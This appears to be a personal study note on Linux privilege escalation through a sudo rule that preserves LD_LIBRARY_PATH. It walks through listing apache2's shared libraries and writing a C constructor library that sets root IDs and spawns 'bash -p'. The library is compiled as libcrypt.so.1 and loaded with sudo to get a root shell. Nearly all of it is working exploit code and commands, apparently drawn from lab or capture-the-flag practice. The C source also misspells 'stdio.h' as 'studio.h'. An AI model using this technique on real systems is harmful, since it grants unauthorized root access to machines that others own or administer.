# LD_LIBRARY_PATH The LD_LIBRARY_PATH environment variable contains a set of directories where shared libraries are searched for first. The ldd command can be used to print the shared libraries used by a program: ```bash $ ldd /usr/sbin/apache2 ``` By creating a shared library with the same name as the one used by a program, and setting the LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead Run the ```sudo -l ``` command: ![[Pasted image 20220805233127.png]] The above example shows the LD_LIBRARY_PATH environment variable is preserved. Run the following command on apache2: ```bash $ ldd /usr/sbin/apache2 ``` The output will give us a list of shared objects we can replace: ![[Pasted image 20220805233312.png]] For this example we will use the ```libcrypt.so.1``` shared object. Create a file called ```library_path.c``` with the following contents: ```c #include <studio.h> #include <stdlib.h> static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); } ``` Compile the library_path.c file into a shared object with the same name as the one being replaced. ```bash $ gcc -o libcrypt.so.1 -shared -fPIC library_path.c ``` Finally, run apache2 while setting the LD_LIBRARY_PATH evironment variable to the current directory which is where we compiled our shared object. ```bash $ sudo LD_LIBRARY_PATH=. apache2 ``` The shared object is loaded and spawns a root shell. ![[Pasted image 20220805234631.png]]